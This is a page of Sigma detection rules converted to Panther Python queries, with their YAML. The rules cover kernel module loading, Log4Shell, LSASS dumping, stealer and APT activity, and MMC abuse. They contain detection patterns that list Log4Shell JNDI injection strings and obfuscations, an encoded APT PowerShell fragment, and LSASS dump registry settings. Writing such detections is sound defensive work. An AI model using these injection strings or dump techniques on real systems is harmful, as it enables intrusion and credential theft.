Panther detection rules · threatengine.sh

SOAR

Panther

3,750 rules · Sigma detections in Panther syntax

The same Sigma detection corpus, machine-rendered into Panther query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.

Severity critical high medium low all severities

◈

Detection rules

50 shown of 3,750

high

Loading of Kernel Module via Insmod

Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.

status test author Pawel Mazur id 106d7cbd-80ff-4985-b682-a7043e5acb72

panther query

def rule(event):
    if all(
        [
            event.deep_get("type", default="") == "SYSCALL",
            event.deep_get("comm", default="") == "insmod",
            event.deep_get("exe", default="") == "/usr/bin/kmod",
        ]
    ):
        return True
    return False

view Sigma YAML

title: Loading of Kernel Module via Insmod
id: 106d7cbd-80ff-4985-b682-a7043e5acb72
status: test
description: |
    Detects loading of kernel modules with insmod command.
    Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
    Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md
    - https://linux.die.net/man/8/insmod
    - https://man7.org/linux/man-pages/man8/kmod.8.html
author: 'Pawel Mazur'
date: 2021-11-02
modified: 2022-12-25
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1547.006
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'SYSCALL'
        comm: insmod
        exe: /usr/bin/kmod
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Local Privilege Escalation Indicator TabTip

Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

status test author Florian Roth (Nextron Systems) id bc2e25ed-b92b-4daa-b074-b502bdd1982b

panther query

def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Microsoft-Windows-DistributedCOM",
            event.deep_get("EventID", default="") == 10001,
            event.deep_get("param1", default="")
            == "C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe",
            event.deep_get("param2", default="") == 2147943140,
            event.deep_get("param3", default="") == "{054AAE20-4BEA-4347-8A35-64A533254A9D}",
        ]
    ):
        return True
    return False

view Sigma YAML

title: Local Privilege Escalation Indicator TabTip
id: bc2e25ed-b92b-4daa-b074-b502bdd1982b
status: test
description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
references:
    - https://github.com/antonioCoco/JuicyPotatoNG
author: Florian Roth (Nextron Systems)
date: 2022-10-07
modified: 2023-04-14
tags:
    - attack.collection
    - attack.execution
    - attack.credential-access
    - attack.t1557.001
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Microsoft-Windows-DistributedCOM'
        EventID: 10001
        param1: 'C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe'  # Binary starting/started
        param2: 2147943140                                                       # ERROR id
        param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}'                         # DCOM Server
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Log4j RCE CVE-2021-44228 Generic

Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)

status test author Florian Roth (Nextron Systems) id 5ea8faa8-db8b-45be-89b0-151b84c82702

panther query

import json


def rule(event):
    if all(
        [
            any(
                [
                    "${jndi:ldap:/" in json.dumps(event.to_dict()),
                    "${jndi:rmi:/" in json.dumps(event.to_dict()),
                    "${jndi:ldaps:/" in json.dumps(event.to_dict()),
                    "${jndi:dns:/" in json.dumps(event.to_dict()),
                    "/$%7bjndi:" in json.dumps(event.to_dict()),
                    "%24%7bjndi:" in json.dumps(event.to_dict()),
                    "$%7Bjndi:" in json.dumps(event.to_dict()),
                    "%2524%257Bjndi" in json.dumps(event.to_dict()),
                    "%2F%252524%25257Bjndi%3A" in json.dumps(event.to_dict()),
                    "${jndi:${lower:" in json.dumps(event.to_dict()),
                    "${::-j}${" in json.dumps(event.to_dict()),
                    "${jndi:nis" in json.dumps(event.to_dict()),
                    "${jndi:nds" in json.dumps(event.to_dict()),
                    "${jndi:corba" in json.dumps(event.to_dict()),
                    "${jndi:iiop" in json.dumps(event.to_dict()),
                    "Reference Class Name: foo" in json.dumps(event.to_dict()),
                    "${${env:BARFOO:-j}" in json.dumps(event.to_dict()),
                    "${::-l}${::-d}${::-a}${::-p}" in json.dumps(event.to_dict()),
                    "${base64:JHtqbmRp" in json.dumps(event.to_dict()),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$" in json.dumps(event.to_dict()),
                    "${${lower:j}ndi:" in json.dumps(event.to_dict()),
                    "${${upper:j}ndi:" in json.dumps(event.to_dict()),
                    "${${::-j}${::-n}${::-d}${::-i}:" in json.dumps(event.to_dict()),
                ]
            ),
            not any(
                [
                    "w.nessus.org/nessus" in json.dumps(event.to_dict()),
                    "/nessus}" in json.dumps(event.to_dict()),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Log4j RCE CVE-2021-44228 Generic
id: 5ea8faa8-db8b-45be-89b0-151b84c82702
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2022-02-06
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    keywords:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${jndi:ldaps:/'
        - '${jndi:dns:/'
        - '/$%7bjndi:'
        - '%24%7bjndi:'
        - '$%7Bjndi:'
        - '%2524%257Bjndi'
        - '%2F%252524%25257Bjndi%3A'
        - '${jndi:${lower:'
        - '${::-j}${'
        - '${jndi:nis'
        - '${jndi:nds'
        - '${jndi:corba'
        - '${jndi:iiop'
        - 'Reference Class Name: foo'
        - '${${env:BARFOO:-j}'
        - '${::-l}${::-d}${::-a}${::-p}'
        - '${base64:JHtqbmRp'
        - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
        - '${${lower:j}ndi:'
        - '${${upper:j}ndi:'
        - '${${::-j}${::-n}${::-d}${::-i}:'
    filter:
        - 'w.nessus.org/nessus'
        - '/nessus}'
    condition: keywords and not filter
falsepositives:
    - Vulnerability scanning
level: high

Convert to SIEM query

high

Log4j RCE CVE-2021-44228 in Fields

Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)

status test author Florian Roth (Nextron Systems) id 9be472ed-893c-4ec0-94da-312d2765f654

panther query

def rule(event):
    if any(
        [
            any(
                [
                    "${jndi:ldap:/" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:rmi:/" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:ldaps:/" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:dns:/" in event.deep_get("cs-user-agent", default=""),
                    "/$%7bjndi:" in event.deep_get("cs-user-agent", default=""),
                    "%24%7bjndi:" in event.deep_get("cs-user-agent", default=""),
                    "$%7Bjndi:" in event.deep_get("cs-user-agent", default=""),
                    "%2524%257Bjndi" in event.deep_get("cs-user-agent", default=""),
                    "%2F%252524%25257Bjndi%3A" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:${lower:" in event.deep_get("cs-user-agent", default=""),
                    "${::-j}${" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:nis" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:nds" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:corba" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:iiop" in event.deep_get("cs-user-agent", default=""),
                    "Reference Class Name: foo" in event.deep_get("cs-user-agent", default=""),
                    "${${env:BARFOO:-j}" in event.deep_get("cs-user-agent", default=""),
                    "${::-l}${::-d}${::-a}${::-p}" in event.deep_get("cs-user-agent", default=""),
                    "${base64:JHtqbmRp" in event.deep_get("cs-user-agent", default=""),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$"
                    in event.deep_get("cs-user-agent", default=""),
                    "${${lower:j}ndi:" in event.deep_get("cs-user-agent", default=""),
                    "${${upper:j}ndi:" in event.deep_get("cs-user-agent", default=""),
                    "${${::-j}${::-n}${::-d}${::-i}:"
                    in event.deep_get("cs-user-agent", default=""),
                ]
            ),
            any(
                [
                    "${jndi:ldap:/" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:rmi:/" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:ldaps:/" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:dns:/" in event.deep_get("cs-uri-query", default=""),
                    "/$%7bjndi:" in event.deep_get("cs-uri-query", default=""),
                    "%24%7bjndi:" in event.deep_get("cs-uri-query", default=""),
                    "$%7Bjndi:" in event.deep_get("cs-uri-query", default=""),
                    "%2524%257Bjndi" in event.deep_get("cs-uri-query", default=""),
                    "%2F%252524%25257Bjndi%3A" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:${lower:" in event.deep_get("cs-uri-query", default=""),
                    "${::-j}${" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:nis" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:nds" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:corba" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:iiop" in event.deep_get("cs-uri-query", default=""),
                    "Reference Class Name: foo" in event.deep_get("cs-uri-query", default=""),
                    "${${env:BARFOO:-j}" in event.deep_get("cs-uri-query", default=""),
                    "${::-l}${::-d}${::-a}${::-p}" in event.deep_get("cs-uri-query", default=""),
                    "${base64:JHtqbmRp" in event.deep_get("cs-uri-query", default=""),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$"
                    in event.deep_get("cs-uri-query", default=""),
                    "${${lower:j}ndi:" in event.deep_get("cs-uri-query", default=""),
                    "${${upper:j}ndi:" in event.deep_get("cs-uri-query", default=""),
                    "${${::-j}${::-n}${::-d}${::-i}:" in event.deep_get("cs-uri-query", default=""),
                ]
            ),
            any(
                [
                    "${jndi:ldap:/" in event.deep_get("cs-referer", default=""),
                    "${jndi:rmi:/" in event.deep_get("cs-referer", default=""),
                    "${jndi:ldaps:/" in event.deep_get("cs-referer", default=""),
                    "${jndi:dns:/" in event.deep_get("cs-referer", default=""),
                    "/$%7bjndi:" in event.deep_get("cs-referer", default=""),
                    "%24%7bjndi:" in event.deep_get("cs-referer", default=""),
                    "$%7Bjndi:" in event.deep_get("cs-referer", default=""),
                    "%2524%257Bjndi" in event.deep_get("cs-referer", default=""),
                    "%2F%252524%25257Bjndi%3A" in event.deep_get("cs-referer", default=""),
                    "${jndi:${lower:" in event.deep_get("cs-referer", default=""),
                    "${::-j}${" in event.deep_get("cs-referer", default=""),
                    "${jndi:nis" in event.deep_get("cs-referer", default=""),
                    "${jndi:nds" in event.deep_get("cs-referer", default=""),
                    "${jndi:corba" in event.deep_get("cs-referer", default=""),
                    "${jndi:iiop" in event.deep_get("cs-referer", default=""),
                    "Reference Class Name: foo" in event.deep_get("cs-referer", default=""),
                    "${${env:BARFOO:-j}" in event.deep_get("cs-referer", default=""),
                    "${::-l}${::-d}${::-a}${::-p}" in event.deep_get("cs-referer", default=""),
                    "${base64:JHtqbmRp" in event.deep_get("cs-referer", default=""),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$"
                    in event.deep_get("cs-referer", default=""),
                    "${${lower:j}ndi:" in event.deep_get("cs-referer", default=""),
                    "${${upper:j}ndi:" in event.deep_get("cs-referer", default=""),
                    "${${::-j}${::-n}${::-d}${::-i}:" in event.deep_get("cs-referer", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-44228
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection1:
        cs-user-agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    # selection2:
        # user-agent|contains:
            # - '${jndi:ldap:/'
            # - '${jndi:rmi:/'
            # - '${jndi:ldaps:/'
            # - '${jndi:dns:/'
            # - '/$%7bjndi:'
            # - '%24%7bjndi:'
            # - '$%7Bjndi:'
            # - '%2524%257Bjndi'
            # - '%2F%252524%25257Bjndi%3A'
            # - '${jndi:${lower:'
            # - '${::-j}${'
            # - '${jndi:nis'
            # - '${jndi:nds'
            # - '${jndi:corba'
            # - '${jndi:iiop'
            # - 'Reference Class Name: foo'
            # - '${${env:BARFOO:-j}'
            # - '${::-l}${::-d}${::-a}${::-p}'
            # - '${base64:JHtqbmRp'
            # - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            # - '${${lower:j}ndi:'
            # - '${${upper:j}ndi:'
            # - '${${::-j}${::-n}${::-d}${::-i}:'
    selection3:
        cs-uri-query|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    selection4:
        cs-referer|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    condition: 1 of selection*
falsepositives:
    - Vulnerability scanning
level: high

Convert to SIEM query

high

Logging Configuration Changes on Linux Host

Detect changes of syslog daemons configuration files

status test author Mikhail Larin, oscd.community id c830f15d-6f6e-430f-8074-6f73d6807841

panther query

def rule(event):
    if all(
        [
            event.deep_get("type", default="") == "PATH",
            event.deep_get("name", default="")
            in ["/etc/syslog.conf", "/etc/rsyslog.conf", "/etc/syslog-ng/syslog-ng.conf"],
        ]
    ):
        return True
    return False

view Sigma YAML

title: Logging Configuration Changes on Linux Host
id: c830f15d-6f6e-430f-8074-6f73d6807841
status: test
description: Detect changes of syslog daemons configuration files
references:
    - self experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'PATH'
        name:
            - /etc/syslog.conf
            - /etc/rsyslog.conf
            - /etc/syslog-ng/syslog-ng.conf
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: high

Convert to SIEM query

high

Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json

status test author frack113 id 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d

panther query

def rule(event):
    if (
        "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
        in event.deep_get("TargetObject", default="")
    ):
        return True
    return False

view Sigma YAML

title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
status: test
description: |
    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
    anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
references:
    - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
author: frack113
date: 2022-05-28
modified: 2023-08-17
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Lsass Full Dump Request Via DumpType Registry Settings

Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.

status test author @pbssubhash id 33efc23c-6ea2-4503-8cfe-bdf82ce8f719

panther query

def rule(event):
    if all(
        [
            any(
                [
                    "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType"
                    in event.deep_get("TargetObject", default=""),
                    "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType"
                    in event.deep_get("TargetObject", default=""),
                ]
            ),
            event.deep_get("Details", default="") == "DWORD (0x00000002)",
        ]
    ):
        return True
    return False

view Sigma YAML

title: Lsass Full Dump Request Via DumpType Registry Settings
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
status: test
description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
references:
    - https://github.com/deepinstinct/Lsass-Shtinkering
    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
author: '@pbssubhash'
date: 2022-12-08
modified: 2023-08-17
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType'
            - '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType'
        Details: 'DWORD (0x00000002)' # Full Dump
    condition: selection
falsepositives:
    - Legitimate application that needs to do a full dump of their process
level: high

Convert to SIEM query

high

Lsass Memory Dump via Comsvcs DLL

Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) id a49fa4d5-11db-418c-8473-1e014a8dd462

panther query

def rule(event):
    if all(
        [
            event.deep_get("TargetImage", default="").endswith("\\lsass.exe"),
            event.deep_get("SourceImage", default="").endswith("\\rundll32.exe"),
            "comsvcs.dll" in event.deep_get("CallTrace", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Lsass Memory Dump via Comsvcs DLL
id: a49fa4d5-11db-418c-8473-1e014a8dd462
status: test
description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
references:
    - https://twitter.com/shantanukhande/status/1229348874298388484
    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2023-11-29
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_access
    product: windows
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        SourceImage|endswith: '\rundll32.exe'
        CallTrace|contains: 'comsvcs.dll'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Lummac Stealer Activity - Execution Of More.com And Vbc.exe

Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.

status experimental author Joseliyo Sanchez, @Joseliyo_Jstnk id 19b3806e-46f2-4b4c-9337-e3d8653245ea

panther query

def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\more.com"),
            any(
                [
                    event.deep_get("Image", default="").endswith("\\vbc.exe"),
                    event.deep_get("OriginalFileName", default="") == "vbc.exe",
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: |
    Detects the execution of more.com and vbc.exe in the process tree.
    This behavior was observed by a set of samples related to Lummac Stealer.
    The Lummac payload is injected into the vbc.exe process.
references:
    - https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files
    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-12-19
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
    selection_parent:
        ParentImage|endswith: '\more.com'
    selection_child:
        - Image|endswith: '\vbc.exe'
        - OriginalFileName: 'vbc.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

MERCURY APT Activity

Detects suspicious command line patterns seen being used by MERCURY APT

status test author Florian Roth (Nextron Systems) id a62298a3-1fe0-422f-9a68-ffbcbc5a123d

panther query

def rule(event):
    if all(
        [
            "-exec bypass -w 1 -enc" in event.deep_get("CommandLine", default=""),
            "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
            in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MERCURY APT Activity
id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d
status: test
description: Detects suspicious command line patterns seen being used by MERCURY APT
references:
    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
author: Florian Roth (Nextron Systems)
date: 2022-08-26
modified: 2023-03-10
tags:
    - attack.execution
    - attack.t1059.001
    - attack.g0069
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '-exec bypass -w 1 -enc'
            - 'UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA'  # Start-Job -ScriptBlock
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

MMC Executing Files with Reversed Extensions Using RTLO Abuse

Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.

status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) id 9cfe4b27-1e56-48b4-b7a8-d46851c91a44

panther query

def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\mmc.exe"),
                    event.deep_get("OriginalFileName", default="") == "MMC.exe",
                ]
            ),
            any(
                [
                    "cod.msc" in event.deep_get("CommandLine", default=""),
                    "fdp.msc" in event.deep_get("CommandLine", default=""),
                    "ftr.msc" in event.deep_get("CommandLine", default=""),
                    "lmth.msc" in event.deep_get("CommandLine", default=""),
                    "slx.msc" in event.deep_get("CommandLine", default=""),
                    "tdo.msc" in event.deep_get("CommandLine", default=""),
                    "xcod.msc" in event.deep_get("CommandLine", default=""),
                    "xslx.msc" in event.deep_get("CommandLine", default=""),
                    "xtpp.msc" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
id: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44
status: experimental
description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
references:
    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf
    - https://en.wikipedia.org/wiki/Right-to-left_override
    - https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
    - attack.execution
    - attack.stealth
    - attack.t1204.002
    - attack.t1218.014
    - attack.t1036.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_image:
        - Image|endswith: '\mmc.exe'
        - OriginalFileName: 'MMC.exe'
    selection_commandline:
        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file
            - 'cod.msc'  # Reversed `.doc`
            - 'fdp.msc'  # Reversed `.pdf`
            - 'ftr.msc'  # Reversed `.rtf`
            - 'lmth.msc'  # Reversed `.html`
            - 'slx.msc'  # Reversed `.xls`
            - 'tdo.msc'  # Reversed `.odt`
            - 'xcod.msc'  # Reversed `.docx`
            - 'xslx.msc'  # Reversed `.xlsx`
            - 'xtpp.msc'  # Reversed `.pptx`
    condition: all of selection_*
falsepositives:
    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
    - Unconventional but non-malicious usage of RLO or reversed extensions.
level: high

Convert to SIEM query

high

MMC Spawning Windows Shell

Detects a Windows command line executable started from MMC

status test author Karneades, Swisscom CSIRT id 05a2ab7e-ce11-4b63-86db-ab32e763e11d

panther query

def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\mmc.exe"),
            any(
                [
                    any(
                        [
                            event.deep_get("Image", default="").endswith("\\cmd.exe"),
                            event.deep_get("Image", default="").endswith("\\powershell.exe"),
                            event.deep_get("Image", default="").endswith("\\pwsh.exe"),
                            event.deep_get("Image", default="").endswith("\\wscript.exe"),
                            event.deep_get("Image", default="").endswith("\\cscript.exe"),
                            event.deep_get("Image", default="").endswith("\\sh.exe"),
                            event.deep_get("Image", default="").endswith("\\bash.exe"),
                            event.deep_get("Image", default="").endswith("\\reg.exe"),
                            event.deep_get("Image", default="").endswith("\\regsvr32.exe"),
                        ]
                    ),
                    "\\BITSADMIN" in event.deep_get("Image", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: MMC Spawning Windows Shell
id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
status: test
description: Detects a Windows command line executable started from MMC
references:
    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
author: Karneades, Swisscom CSIRT
date: 2019-08-05
modified: 2022-07-14
tags:
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|endswith: '\mmc.exe'
    selection2:
        - Image|endswith:
              - '\cmd.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\wscript.exe'
              - '\cscript.exe'
              - '\sh.exe'
              - '\bash.exe'
              - '\reg.exe'
              - '\regsvr32.exe'
